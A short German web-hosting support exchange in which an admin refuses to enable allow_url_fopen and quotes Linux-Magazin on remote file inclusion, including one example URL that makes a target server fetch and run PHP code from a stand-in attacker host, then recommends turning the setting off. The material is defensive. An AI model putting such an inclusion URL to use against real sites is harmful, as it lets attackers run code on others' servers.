[Bernie]

Hallo

habe ein Script welches dei Funktion "allow_url_fopen = ON" benötigt.

Ist es möglich das umzustellen oder ist das ein Sicherheitsrisiko

[admin]

Hallo Bernie,

das ist allerdings ein erhebliches Sicherheitsrisiko und wurde deshalb deaktiviert. Ich zitiere hier mal aus dem Linux-Magazin:

Manipuliert ein Angreifer die URL und lässt sie auf PHP-Code zeigen, der auf einem externen Webserver liegt, lädt der angegriffene Server diesen Code, bindet ihn an passender Stelle ein und führt ihn aus. Abbildung 5 zeigt den Ablauf. Die manipulierte URL enthält die Adresse des Angreifer-Servers:

http://www.Server.de/cms/index.php?id=http://www.Angreifer.de/hackcode.php

Ein weiterer Parameter in der Konfigurationsdatei »php.ini« schafft Abhilfe:

allow_url_fopen_=no